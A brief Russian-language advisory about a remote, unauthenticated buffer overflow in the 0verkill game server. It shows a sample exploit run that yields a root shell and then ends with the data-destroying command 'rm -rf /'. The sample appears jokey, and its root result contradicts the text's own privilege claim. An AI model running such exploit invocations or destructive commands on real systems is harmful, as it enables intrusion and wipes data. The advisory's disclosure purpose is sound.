Overkill популярная клиент-серверная игра в ASCII art. Серверная часть 0verkill по умолчанию установлена на 6666 UDP порту.

В программе обнаружена возможность удаленного переполнения буфера, которое может использоваться для выполнения произвольного кода с привилегиями 0verkill процесса. Для успешной эксплуатации уязвимости не требуется предварительная идентификация. Пример работы эксплоита:

deraadt@zeus.theos.com:~$ ./0verkillflow -t 5 -h 192.168.0.1 -o l -p 6666
Attacking host 192.168.0.1 (Linux 2.4.20-grsec).
*GOBBLE*
id; uname -a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux spender 2.4.20 #1 Sat Dec 7 13:44:54 EST 2002 i686 unknown
^C
deraadt@zeus.theos.com:~$ su -

Password:
root@zeus.theos.com:~# rm -rf /&

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии